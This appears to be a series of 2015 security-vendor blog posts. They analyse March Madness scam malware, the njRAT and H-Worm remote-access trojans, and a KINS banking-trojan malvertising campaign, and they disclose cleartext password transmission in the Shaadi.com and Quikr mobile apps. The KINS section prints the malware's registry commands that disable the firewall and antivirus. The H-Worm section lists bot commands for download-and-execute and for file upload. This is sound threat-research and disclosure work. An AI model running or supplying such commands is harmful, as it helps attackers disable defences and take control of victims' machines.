Friday, March 20, 2015

March Madness Ads, Scams, and Malware

Introduction

March Madness is officially upon us, with the last games of the round of 64 taking place today. As is usual with events that have such a level of interest, bad actors across the internet will be trying to get their cut of the action through topical spam advertising and phishing as well as search engine poisoning to draw ad revenue and in some cases, deliver malicious software. Though it is still early in the cycle of March Madness interest, we have seen a bit of everything: malware purporting to be NCAA bracket templates, a rash of ad-filled sites running March Madness related SEO campaigns, and the usual complement of shady streaming sites promising live streams of the tournament games (with some delivering a nasty surprise).

NCAA Tournament related traffic shows a sharp uptick as the games began.


NCAA Bracket Download Leads to Malware

While reviewing some of the tournament-related security blocks, we spotted an interesting file download attempt. It's not clear if the original click was derived from a search, but the primary link purports to be a zipped PDF file that can be used to create personalized brackets. The link ultimately directs to an unwanted EXE signed by the Ukranian publisher BERSHNET LLC (whose history is well documented on HerdProtect).

The downloaded file features a valid Authenticode Certificate.

The binary features an unusual number of protections against analysis for what appears to be simple adware. At this time, we have not fully explored the capabilities of the binary, but analysis shows that the sample gathers system information and sends it to a CloudFlare-hosted command & control server.

HTTP Check-in activity includes POSTing system information.
Fake .tk Blogs Generate Ad Revenue and Expose Users

Numerous ad-filled and auto-generated blogs have been popping up to take advantage of unwary search-engine users looking for bracket templates and related web-searches. While we have not seen any overtly malicious behavior on these sites, they represent a potential threat against the unwary searcher.


Auto-generated blogs taking advantage of popular search terms.
An interesting trend among these sites is the use of the free country TLD .tk. This isn't too surprising since the use of free domains is similar to the use of a dynamic DNS service, but the .tk TLD is slightly less conspicuous compared to no-ip.com or other common alternatives.

Streaming Scams Deliver Malware

Similar to sites offering bracket templates and insights on the match-ups, a large number of sites promising the ability to stream NCAA games have popped up to capture search traffic and generate ad-revenue. Unlike the SEO blogs, we have spotted -- and blocked -- malicious downloads related to tournament streams.


Numerous scam sites are found among the top Google hits.
Fake streaming site is filled with ads and fake plug-in install prompts.
Download page for fake plug-in emulates Adobe look and feel.
Although this binary does not initially appear as sophisticated as the fake-bracket sample above, it downloads two supplemental encrypted files, one large binary blob and one base-64 encoded text file. Further analysis is needed to enumerate all functionality, but the malware can be observed collecting system information and sending it to a remote server.

Post-infection activity downloads another binary and POSTs system information.
It should be noted that the NCAA has put tight restrictions on the streaming of the tournament, and apart from the first round, streaming the games requires a pay-TV subscription.

Conclusion

All of these examples should highlight the diversity of threats that latch on to the popularity of March Madness. We would like to advise the readers to exercise caution when doing searches or clicking on links related to March Madness.


Zscaler ThreatLabZ has deployed multiple layers of protection against these scams, safeguarding the users even when they are tricked into clicking a nefarious link.

njRAT & H-Worm variant infections continue to rise

Introduction

njRAT Trojan also known as Bladabindi, is a Remote Access Tool (RAT) that was first seen in 2013 and has been extremely prevalent in the Middle Eastern region. njRAT was developed using Microsoft's .NET framework and like many other RATs, provides complete control of the infected system and delivers an array of features to the remote attacker. We have seen attackers leveraging popular gaming & software application cracks & keygens as the lure to infect end users.

There have been many variants of njRAT. H-Worm, also known as Houdini, is one of the most popular variants and was reportedly used in attacks against the international energy sector. In this blog we will provide a brief overview of njRAT and H-Worm as well as an analysis of the H-Worm activity we've seen over the past few months.

njRAT

The njRAT Trojan remains one of the most successful RATs in the wild because of the wide spread online support and tutorials available for cyber criminals. There are a variety of .NET obfuscation tools that make detection difficult for antivirus solutions and hinders analysis by security researchers. njRAT utilizes dynamic DNS for command and control (C2) servers and communicates using a custom TCP protocol over a configurable port.

The C&C callback from the infected system includes following information:
  • Bot identifier (based off configurable string in builder & volume serial number)
  • Computer name (Base 64 encoded)
  • Operating system information
  • Existence of attached webcam (Yes/No)
  • Bot version
  • Country code
  • Title of the active process window
Below is a sample C&C message:

253 ll|'|'|TW9pXzUwRkFBNTQw|'|'|247525|'|'|Win7 64Bit|'|'|79-11-30|'|'||'|'|Win7 Enterprise SP1 x64|'|'|No|'|'|0.7d|'|'|..|'|'|QWRtaW5pc3RyYXRvcjogQzpcV2luZG93c1xzeXN0ZW0zMlxjbWQuZXhlIC0gYzpcUHl0aG9uMjdccHl0aG9uLmV4ZSAgc2ltcGxlX3NvY2tldF9zZXJ2ZXIucHkA|'|'|

Decoded Base64 string #1 (botID_volume-serial-number): Moi_50FAA540
Decoded Base64 string #2 (currently focused window): Administrator: C:\Windows\system32\cmd.exe - 

njRAT allows the remote attacker to perform following activities on the infected system:
  • File system changes
  • Log keystrokes
  • Download and execute a remote file
  • Remote desktop
  • Webcam access
  • Microphone access
  • Obtain user credentials for multiple applications
  • Reverse command shell
The latest instances of njRAT infections we have seen are for version 0.7d. Below are some screenshots of the njRAT's control panel accessible to the attacker:

njRAT C&C control panel

njRAT builder panel

njRAT author information

H-Worm

H-Worm is a VBS (Visual Basic Script) based RAT which we believe is derived off the njRAT source code. H-Worm provides cyber-criminals similar controls to njRAT. It also uses dynamic DNS for its C&C servers but unlike njRAT it uses POST requests and the HTTP User-Agent field to exfiltrate sensitive information from the infected machine.

The C&C communication POST requests typically uses parameters 'cmd' and 'param' as seen in the table below:


H-Worm Bot Command Summary
Bot Command Description Example Connection URI
execute Execute vb code sent in response execute<|>vbscript code None
update Update bot code to provided code (overwrites existing file) update<|>new vbscript bot code None
uninstall Removes the bot from the victim machine uninstall None
send Downloads content from a URL and dumps at a directory send<|>http://www.example.com/malware.exe<|>c:\ None
site-send Downloads content from a URL and saves with specified nam site-send<|>http://www.example.com/script.vbs<|>c:\script.vbs None
recv Uploads a file to the C2 domain recv<|>C:\Users\User\Documents\passwords.txt POST /is-recving
enum-driver Sends information on the victim's system drives enum-driver POST /is-enum-driver
enum-faf Sends a directory listing for a given path enum-faf<|>C:\Users\User\ POST /is-enum-path
enum-process Sends the process listing of the victim's system enum-process POST /is-enum-process
cmd-shell Run a command via '%comspec% /c' on the infected host cmd-shell<|>calc.exe POST /is-cmd-shell
delete Deletes a specified file or folder from the victim's system delete<|>C:\Users\User\Documents\ None
exit-process Kills the specified process ID via taskkill exit-process<|>123 None
sleep Sets the number of milliseconds to sleep between 'ready' beacons (default 5000) sleep<|>10000 None


The C&C callback from an infected system includes following information in the User-Agent field:
  • Bot identifier (based off configurable string in builder & volume serial number)
  • Computer name
  • Username
  • Operating system information
  • Bot version
  • Antivirus information (Default value 'nan-av')
  • USB spreading [true/false] with date obtained from bot's registry entry.
Below are some screenshots of H-Worm's control panel accessible to the attacker, from two different variants:

H-Worm plus version C&C control panel

H-Worm control center [similar to njRAT's Manager]

H-Worm plus version builder panel

H-Worm extended/lite version C&C control panel

We continue to see many new variants of H-Worm popping up in the wild. Below are the version strings from some of the active H-Worm variants we have been tracking in 2015:
  • 2.0
  • 3az version
  • hello
  • KKMM NICE PC
  • mod version
  • plus
  • POUSSIN
  • safa7_22
  • SKY ESP PC
  • spupdate
  • the KR.joker worm
  • underworld final
  • v1.8.3  By AB DELL
  • v1.8.7  By AB DELL
  • worm Of Dz-47
  • WORM OF DZ-47
Below is the Geo distribution of the active Command & Control servers we have oberved thus far in 2015:


One of the most popular features of this RAT family is the usage of Dynamic DNS for its Command & Control server communication. We have seen multiple sub-domains from the following Dynamic DNS domains in 2015 being abused by the malware authors for C&C communication:
  • adultdns.net
  • cable-modem.org
  • dz47.cf
  • ddns.net
  • dnsd.info
  • dvr-ddns.com
  • dyndns.org
  • dynu.net
  • ftp21.net
  • mooo.com
  • myq-see.com
  • no-ip.biz
  • noip.me
  • no-ip.org
  • redirectme.net
  • sells-it.net
  • servecounterstrike.com
  • serveftp.com
  • servehttp.com
  • servequake.com
  • sytes.net
  • user32.com
  • zapto.org
Conclusion

njRAT & H-Worm variant infections continue to rise, and while this threat is reportedly more prevalent in the Middle-East region, we continue to see infections in other parts of the world as well. Despite Microsoft's attempts to disrupt the C&C channel for this notorious RAT back in June 2014, we continue to see the usage of various dynamic DNS services by the malware authors for it's C&C server communication. It remains one of the most popular and prevalent RATs in the wild today.

Zscaler ThreatLabZ has deployed multiple layers of protection against this threat to ensure that the customers are protected.

Past reports on this threat
http://www.fidelissecurity.com/sites/default/files/FTA_1009-njRAT_Uncovered_rev2.pdf
http://www.fidelissecurity.com/sites/default/files/FTA%201010%20-%20njRAT%20The%20Saga%20Continues.pdf
http://phishme.com/the-return-of-njrat/
http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/
http://www.symantec.com/connect/blogs/simple-njrat-fuels-nascent-middle-east-cybercrime-scene
https://blogs.mcafee.com/mcafee-labs/trail-njrat
https://www.fireeye.com/blog/threat-research/2013/09/now-you-see-me-h-worm-by-houdini.html

Analysis by Deepen Desai & John Mancuso

Tuesday, March 17, 2015

Mobile App Wall of Shame: Shaadi.com


Shaadi.com

Price : Free
Category : Social
Platform : iOS and Android
Updated : Mar. 9, 2015 (Android), Mar. 10 2015 (iOS)
Version : 4.2.2 (Android), 4.2.1 (iOS)
Size : 8.28 MB (Android), 17.7 MB (iOS)
Language : English
Vendor : People Interactive (I) Pvt. Ltd.

Background:

Shaadi.com is the world's largest matrimonial website, active since 1995. This matrimonial site permits individuals to post their profiles and responses including horoscope, caste, language and religion. Shaadi.com provides applications designed for the two main mobile platforms – iOS and Android.

Application Chart (information retrieved from Appannie & xyo.net):



Android

iOS
Global Ranking
15
92
Category Ranking
12 (Social)
24 (Social networking)
Total number of Downloads
~1 million
 ~0.3 million
Rating
3.9/5
2.7/5

A new user is required to register by providing an email address and a password, along with basic personal details. After registering the account, the user can surf profiles created by others. The application also provides a chat facility.

Vulnerability - Cleartext username/password


Login screen

The current version of the Shaadi.com application has a serious security flaw. It has been verified that both the iOS and Android versions of the application transmit the username and password via HTTP in cleartext. This flaw allows an attacker to capture the credentials sent by a user to the application server and thus compromise the user's account, which may lead to compromise of user's personal data. The service also provides premium accounts to paid customers. 

The application was tested on both the Android and iOS platforms. The vulnerability has been confirmed on Android (v4.2.2 - latest version, updated on Mar. 9, 2015) and iOS (v4.2.1 - latest version, updated on Mar. 10, 2015).  

Vulnerability in iOS version

When a user tries to register for an account on the Shaadi.com application, an HTTP request is generated. In the request the userid, password and mobile number of the user is sent in cleartext as seen below:

Account Registration

[-]http://www.shaadi.com/registration/user/?regmode=app&OS=native-iphone
Method: POST 
Host: www.shaadi.com 
User-Agent: native-iphone|4.1.0 
Request Body: form_referral_url=&form_url=http%3A%2F%2Fwww.shaadi.com%2Fregistration%2Fuser%3Fregmode%3Dapp%26appver%3D4.1.0%26os%3Dnative-iphone%26deviceid%3D---%257C---&form_name=MOB_DR_SEO_REG1&frompage=From+Reg+Page&go=&olmt_home_regpage=&hid_year=&oscode=2&email=fnzscalerlnzscaler%40gmail.com&password1=p%40ssword123&postedby=Self&first_name=fnzscaler&last_name=lnzscaler&gender=Male&day=01&month=01&year=1994&community=No+Religion&mother_tongue=Konkani&countryofresidence=USA&contact_tel_number=Landline+No.

Similarly, when an already existing user tries to login to his account by providing his username and password, these credentials are also being sent in cleartext. Below is the traffic capture when a user tries to login to an existing account:

Login

[-]http://www.shaadi.com/native-apps2/user/login?email=fnzscalerlnzscaler@gmail.com&password=p@ssword123&appver=4.1.0&os=native-iphone&deviceid=---%7C--- 
Method: GET            
Host: www.shaadi.com            
User-Agent: Shaadi/462 CFNetwork/711.1.16 Darwin/14.0.0            
Server Response: {"status":"200","data":{"sid":"7B16D793AFF0443EE1320F85EFD1B4C51425446439","abc":"0CE03847FB4B0C981EB552E34E1C96B61425446522|ZSH82845405|","premium":false,"gender":"Male","age":"21","memberstatus":"ToBeScreened","memberlogin":"ZSH82845405","photograph_status":"photo_request","update_available":false,"has_notification":"N","has_chat_notification":"N","content_settings":{"eoi":"Y","acc":"Y","msg":"Y","nf1":"N","dr":"Y"},"display_name":"SH82845405","username":"SH82845405","email":"fnzscalerlnzscaler@gmail.com","use_connect":1,"upgrade_message":"UPGRADE TO PREMIUM","support_telephone":"1860-200-3456","payment_telephone":"1860-200-3456"},"expdt":"20150403002202","banner_images":{"banner_search_results":{"title":"Become a Premium Member & connect directly via","subtitle":"EMAIL, CHAT & PHONE","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_search_results_male_free_high.png"},"banner_accepted":{"title":"Upgrade to Premium & start chatting with your Accepted Members!","subtitle":"","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_accepted_free.png"},"banner_inbox_single":{"title":"1 Member like your profile!","subtitle":"Become a Premium member & write back to them today","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_inbox_single_male_free_high.png"},"banner_inbox_multiple":{"title":"#count# Members like your profile!","subtitle":"Become a Premium member & write back to them today","details":"","version":"","img":"http:\/\/img.shaadi.com\/community\/images\/app\/banner_inbox_multiple_male_free_high.png"}}} 

Vulnerability in Android version

Account Registration

[-]http://www.shaadi.com/registration/user/?regmode=app&OS=native-android 

Method: POST            

Host: www.shaadi.com            

User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; Nexus 7 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Safari/537.36            

Request Body: form_referral_url=&form_url=http%3A%2F%2Fwww.shaadi.com%2Fregistration%2Fuser%3Fregmode%3Dapp%26os%3Dnative-android%26deviceid%3D--%7C--%26appver%3D4.1.3&form_name=MOB_DR_SEO_REG1&frompage=From+Reg+Page&go=&olmt_home_regpage=&hid_year=&oscode=1&email=vulapps%40zscaler.com&password1=p%40ssword1234&postedby=Self&first_name=fnzscaler&last_name=lnzscaler&gender=Male&day=10&month=10&year=1985&community=Spiritual+-+not+religious&mother_tongue=Marathi&countryofresidence=USA&contact_tel_number=Landline+No. 

Login

[-]http://www.shaadi.com/registration/user/login-submit 

Method: POST            

Host: www.shaadi.com            
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; Nexus 7 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Safari/537.36            
Request Body: go=&email=vulapps%40zscaler.com&password=p%40ssword123&autologin=0&autologin=Y

ZAP analysis:
ZAP in action - Android
ZAP in action - iOS
Conclusion

The list of mobile applications in Google Play and the iTunes App Store that send out sensitive information in cleartext continues to grow. Therefore, it is extremely important to keep separate passwords for different applications and never use the password of your financial applications anywhere else.

Credit: Lakshmi Devi.

Wednesday, March 11, 2015

Malvertising targeting European transit users

Malvertising has been an active and growing attack vector for delivering malicious payloads to unsuspecting users. ThreatLabZ recently uncovered a malvertising campaign targeting European transit users and the end payload appears to be downloading the KINS Zeus variant.

The KINS (Kasper Internet Non-Security) variant of Zeus is a banking Trojan that has been prevalent since 2011. KINS is a crimekit that was developed based off the leaked ZeuS source code to replace the aged Citadel Trojan which was used to harvest credentials from victim PCs.

ThreatLabZ has seen many instances of this threat being downloaded in the wild with very low AV detection.  The malicious dropper payload is downloaded from URLs that matches the following pattern:

[domain]:[nonstandard port]/[var1].php?[var2]=n&[var3]=n&[var4]=n&[var5]=n&[var6]=n&[var7]=n&[var8]=n
n = random [1-4]digit number

 Some examples of this activity are seen below:
  • rasaqsense[.]abbington[.]org:9090/full[.]php?refer=2010&reklama=4&star=860&site-map=171&blogs=78&click=2407&honda=2707
  • razorssense[.]abbington[.]org:9090/full[.]php?back=1933&reklama=4&edit=2109&site-map=171&mail=366&page=6&virus=986
  • brazil[.]telefonabrasil[.]com[.]br:8181/beta[.]php?corp=252&play=1249&popular=4&video=775&rssfeed=171&store=1416&deals=634
  • abfronikl[.]mobi:20204/store[.]php?rates=2197&sendmail=4&ports=635&logout=171&other=1679&image=523&comp=2566
  • panga[.]campanha[.]ga:8181/hardcore[.]php?best=1704&wink=205&humor=4&cover=2210&support=171&reply=1750&atom=1017
  • sega[.]taxivega[.]kz:17340/music[.]php?macos=2433&rate=1041&game=4&nomic=1534&layout=171&humor=2699&usage=2115
  • seww[.]istec[.]se:17340/music[.]php?media=432&page=2637&game=4&audit=833&layout=171&about=2332&cover=2361
  • anarhism[.]temayang[.]tk:17340/music[.]php?event=2561&game=4&stars=2402&layout=171&warez=2596&intl=1014&story=2510
  • clipsalinga[.]org:20204/store[.]php?intm=134&sendmail=4&front=1022&logout=171&tool=2554&radio=116&docs=1851
  • clipsalinga[.]org:20204/store[.]php?linux=280&sendmail=4&best=361&logout=171&cert=1236&quote=118&math=2297
This variant of the KINS crimekit is spreading through malvertising attempts targeting European users. All the download attempts seen above have two things in common:
  1. Victims were visiting a site related to European transit
  2. Victims were redirected to the final destination through an advertising network

Sample infection cycle URLs

The malware masquerades as a PDF document to lure an unsuspecting user into opening the file. Upon execution, it creates a copy of itself in the %Application Data% directory, deletes the original copy of itself and injects into the system explorer.exe process to perform variety of actions. The dropped file on the infected system can be found at one of the following two locations:
  • %Application Data%\svchoste.exe [Windows XP]
  • %Application Data%\Roaming\[random 4-5 character string]\[random 4-5 character string].exe  [Windows 7]

The bot further makes multiple system registry modifications to evade detection:
  • Microsoft security center - disable update notifications, disable antimalware scan:
reg add HKLM\SOFTWARE\Microsoft\Security Center /v UpdatesDisableNotify /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallOverride /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v FirewallDisableNotify /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusOverride /t reg_dword /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Security Center /v AntiVirusDisableNotify /t reg_dword /d 1 /f
  • Windows firewall settings - Allow exceptions, disable notifications, disable the firewall:
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DisableNotifications /t reg_dword /d 1 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v DoNotAllowExceptions /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\DomainProfile /v EnableFirewall /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DisableNotifications /t reg_dword /d 1 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DisableNotifications /t reg_dword /d 1 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v DoNotAllowExceptions /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\publicprofile /v EnableFirewall /t reg_dword /d 0 /f
reg add HKLM\system\currentcontrolset\Services\SharedAccess\parameters\firewallpolicy\standardprofile /v EnableFirewall /t reg_dword /d 0 /f
  • Windows Defender & AntiMalware settings - Exclude malware processes, injected system processes and certain file types from scanning:
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v svchost.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v consent.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v rundll32.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v spoolsv.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v explorer.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v rgjdu.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes  " /v afwqs.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  " /v *.tmp /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  " /v *.dll /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions  " /v *.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v svchost.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v consent.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v rundll32.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v spoolsv.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v explorer.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v rgjdu.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Processes  " /v afwqs.exe /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  " /v *.tmp /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  " /v *.dll /t  REG_DWORD /d 0  
reg add "HKLM\SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Extensions  " /v *.exe /t  REG_DWORD /d 0
The injected code in the system explorer process is responsible for performing Command & Control (C&C) communication. It also opens up a port (TCP 36139) on the victim machine listening for incoming connections.

Listening on TCP port 36139

There are two common network level indicators to identify a compromised node:
  • A POST transaction with the following hard-coded User-Agent string

 Mozilla/5.0 (Windows; Windows NT 7.1; en; rv:1.9.6.8) Gecko/20120122 Firefox/9.1.2

  • A POST request made to a URI like '/common/link.php'.


POST encrypted information to C&C server


The bot encrypts the system information in the following format and sends it via the above POST request to the C&C server:

v=%d&s=%d&h=%d&un=%s&o=%d&c=%d&ip=%s&sys=%s&uid=%d&w=%d&ftp=

The screenshot below shows the decrypted C&C location as well as a remote configuration file location for the bot:

Decrypted C&C locations

Here are some of the C&C server IP addresses that were contacted by the compromised systems post infection:


Below is the C&C call back activity for the month of January and February, 2015 and the Geo-location of the C&C servers:


C&C server location

Malvertising remains an effective exploit vector for threat actors to compromise victim systems.  The variation in payloads distributed through this tactic range from click-fraud botnet activity to highly effective crimeware, giving complete control of the infected systems to the remote attackers.

Friday, March 6, 2015

Mobile App Wall of Shame: Quikr


Quikr Local Classifieds

Quikr app logo 

Price : Free
Category : Lifestyle/Shopping
Platform : iOS and Android
Updated : February 12, 2015(Android), 22 January 2015(iOS) 
Version : 7.42(Android), 2.8.2(iOS)
Size : 3.89 MB(Android),10 MB(iOS)
Language : English
Vendor : Quikr India

Background:

Quikr is India's largest online and mobile classifieds portal. Like Craigslist, Quikr provides the users with a platform to help them buy, sell, rent and advertise across multiple categories like real estate, jobs, entertainment, education, matrimonial, etc. Quikr also has a mobile app on both the Android and iOS platforms. 


Application Chart (information retrieved from Appannie xyo.net)


Android
iOS
Overall Ranking(India)
20
90
Category Ranking(India)
5 (Shopping)
8 (Lifestyle)
Total number of Downloads
12 Million
108 Thousand 
Rating
4/5
3.5/5


A user is required to provide an email address and password when creating an account. After creating an account, the user can the post advertisements on Quikr. The application also provides functionality wherein different users can chat with each other.

Vulnerability - Clear text username/password

The current version of Quikr mobile application has a serious data leakage vulnerability. It has been verified that both the current Android and iOS versions of the application are sending username and password information via the HTTP protocol in cleartext. This security vulnerability allows an attacker on the same network to capture the credentials sent by a Quikr user to the application server and thus compromise the user's account which may lead to posting fake ads on account owner's behalf, selling and buying products and sending spam messages via chat to other users.

The flaw has been confirmed on versions 7.42 (latest versions available on Feb 12, 2015) on the Android platform and version 2.8 (latest version available on Jan 22, 2015) on the iOS platform. 




Vulnerability in iOS version

When a user tries to register for an account in the Quikr application, an HTTP request is generated as shown below. In this request, the userid, password and mobile number of the user are sent in cleartext. 

Account Registration:

[-]  Method: POST
Url: http://services.quikr.com/api?                 method=registerUser&secCode=fd1f2276c71627c35e2a9c5f8838c09c&version=1.5
Host: services.quikr.com
User-Agent: Quikr/2.8.2 CFNetwork/711.1.16 Darwin/14.0.0
Request Body:cityId=23&userId=zscalerappscan%40zscaler.com&password=password123&mobile=9876543210&demail=969eac57dbfc4079a935fadf7ab261d6%40quikr.com
Server Response: AJBiY , N , .E]n3 , i^0%] , 1}qa , K;\OU4

Similarly, below is the traffic capture when an already existing user tries to login to their account. The userid and password are passed in cleartext.

Login:

[-]  Method: POST
Url: http://services.quikr.com/api?method=login&secCode=fd1f2276c71627c35e2a9c5f8838c09c&version=1.5
Host: services.quikr.com
User-Agent: Quikr/2.8.2 CFNetwork/711.1.16 Darwin/14.0.0
Request Body: demail=969eac57dbfc4079a935fadf7ab261d6@quikr.com&userId=zscalerappscan@zscaler.com&password=password123
Server Response: 1`QaL , B*RD , , ,

Vulnerability in Android version

We will first test the Quikr application installed on a Google Nexus tablet. The Quikr application version available in the Google Play store for the tablet was v6.9. Below is the sample traffic capture when a user tries to register a new Quikr account or login to their existing Quikr account.

Account Registration:

[-]  Method: POST
Url: http://services.quikr.com/api?method=registerUser&version=1.5&secCode=zXcv80386Mdp1hs0q7o0p9uiLZV37TdF&consumerVersion=7.42&density=2.0&demail=qaf4cd1713f1f62078magnumsnip@gmail.com
Host: services.quikr.com
User-Agent: QuikrConsumer
Request Body: --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="cityId" , , 23 , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="demail" , , qaf4cd1713f1f62078magnumsnip@gmail.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="mobile" , , 8234567890 , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="userId" , , appscan@zscaler.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="opf" , , json , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="password" , , p@ssword123
Server Response: {"login":{"auth":1,"code":"usercreated","message":[{"direct":"New user created"}],"email":"appscan@zscaler.com","mobile":"8234567890","city":"23","name":"","UserSession":"PGR8fU59OHVzOWMhfFI+fll0Qj5mdnIjRXd0Rm57T0dZPXw\/Q0RDYCE4amJ5L3R5PHVdTGpORSY6KDhjbl40LlliaztN","emailCRC":null,"cityName":"Bangalore","cityId":"23","app_notif_status":1,"sound_preference":1,"notif_alarmtime":"08:00 PM","userClassification":null,"isSharedPB":0,"isSharedFB":0,"userType":1,"numAlerts":0,"numAds":"0"}}

Login:

[-]  Method: POST
Url: http://services.quikr.com/api?method=login&version=1.5&secCode=zXcv80386Mdp1hs0q7o0p9uiLZV37TdF&consumerVersion=7.42&density=2.0&demail=qaf4cd1713f1f62078magnumsnip@gmail.com
Host: services.quikr.com
User-Agent: QuikrConsumer
Request Body: --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="demail" , , qaf4cd1713f1f62078magnumsnip@gmail.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="userId" , , appscan@zscaler.com , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="opf" , , json , --s2retfgsGSRFsERFGHfgdfgw734yhFHW567TYHSrf4yarg , Content-Disposition: form-data; name="password" , , password123
Server Response: {"login":{"auth":1,"code":"success","message":[{"direct":"You are successfully logged in"}],"email":"appscan@zscaler.com","mobile":"8234567890","city":"23","name":"","UserSession":"PGR8fU59OHVzOWMhfFI+fll0Qj5mdnIjRXd0Rm57T0dZPXw\/Q0RDYCE4amJ5L3R5PHVdTGpORSY6KDhjbl40LlliaztN","emailCRC":null,"cityName":"Bangalore","cityId":"23","app_notif_status":1,"sound_preference":1,"notif_alarmtime":"08:00 PM","userClassification":"0","isSharedPB":0,"isSharedFB":0,"userType":1,"numAlerts":0,"numAds":"0"}}

As you can see in the above requests, all communication between the mobile app and server is in sent via cleartext, which includes sensitive user information.

ZAP Analysis:
ZAP in action - Android
ZAP in action - iOS
This flaw was identified using the Zscaler Application Profiler (ZAP). ZAP is a free online tool that can be used to analyze mobile applications for vulnerabilities and privacy issues as seen in the above screenshots.

Conclusion:
We continue to find new popular applications in the Apple and Google app stores that are leaking device data and sending out sensitive user information in cleartext. This is a good argument for the use of one time passwords when establishing accounts on mobile apps. As a user, you can never know with certainly if your credentials are being transmitted/stored securely. By leveraging a password manager and ensuring that passwords are unique for all apps, at least you can be assured that if your credentials are compromised due to poor app security, only that specific account will be impacted.

Credit: Lakshmi Devi.